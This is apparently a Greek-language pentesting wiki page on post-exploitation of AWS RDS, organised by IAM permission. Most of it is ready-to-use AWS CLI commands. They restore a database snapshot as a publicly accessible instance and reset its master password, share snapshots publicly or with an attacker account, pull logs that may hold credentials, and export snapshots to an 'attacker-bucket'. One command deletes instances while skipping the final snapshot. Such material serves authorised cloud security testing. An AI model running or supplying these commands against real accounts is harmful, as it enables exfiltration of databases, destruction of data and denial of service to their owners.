AWS - RDS Post Exploitation

RDS

Για περισσότερες πληροφορίες ελέγξτε:

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

Εάν ο επιτιθέμενος έχει αρκετά δικαιώματα, θα μπορούσε να κάνει μια DB δημόσια προσβάσιμη δημιουργώντας ένα στιγμιότυπο της DB και στη συνέχεια μια δημόσια προσβάσιμη DB από το στιγμιότυπο.

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

Ένας επιτιθέμενος με αυτές τις άδειες θα μπορούσε να δημιουργήσει ένα στιγμιότυπο μιας βάσης δεδομένων και να το κάνει δημόσια διαθέσιμο. Στη συνέχεια, θα μπορούσε απλά να δημιουργήσει στον δικό του λογαριασμό μια βάση δεδομένων από αυτό το στιγμιότυπο.

Αν ο επιτιθέμενος δεν έχει την rds:CreateDBSnapshot, θα μπορούσε ακόμα να κάνει άλλα δημιουργημένα στιγμιότυπα δημόσια.

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}

rds:DownloadDBLogFilePortion

Ένας επιτιθέμενος με την άδεια rds:DownloadDBLogFilePortion μπορεί να κατεβάσει τμήματα των αρχείων καταγραφής μιας RDS παρουσίας. Εάν ευαίσθητα δεδομένα ή διαπιστευτήρια πρόσβασης καταγραφούν κατά λάθος, ο επιτιθέμενος θα μπορούσε ενδεχομένως να χρησιμοποιήσει αυτές τις πληροφορίες για να κλιμακώσει τα προνόμιά του ή να εκτελέσει μη εξουσιοδοτημένες ενέργειες.

aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text

Πιθανές Επιπτώσεις: Πρόσβαση σε ευαίσθητες πληροφορίες ή μη εξουσιοδοτημένες ενέργειες χρησιμοποιώντας διαρρεύσαντα διαπιστευτήρια.

rds:DeleteDBInstance

Ένας επιτιθέμενος με αυτές τις άδειες μπορεί να DoS υπάρχουσες RDS περιπτώσεις.

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Πιθανές επιπτώσεις: Διαγραφή υπαρχόντων RDS instances και πιθανή απώλεια δεδομένων.

rds:StartExportTask

Ένας επιτιθέμενος με αυτή την άδεια μπορεί να εξάγει ένα στιγμιότυπο RDS instance σε ένα S3 bucket. Εάν ο επιτιθέμενος έχει έλεγχο πάνω στο προορισμένο S3 bucket, μπορεί να έχει πρόσβαση σε ευαίσθητα δεδομένα μέσα στο εξαγόμενο στιγμιότυπο.

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id

Πιθανές επιπτώσεις: Πρόσβαση σε ευαίσθητα δεδομένα στο εξαγόμενο στιγμιότυπο.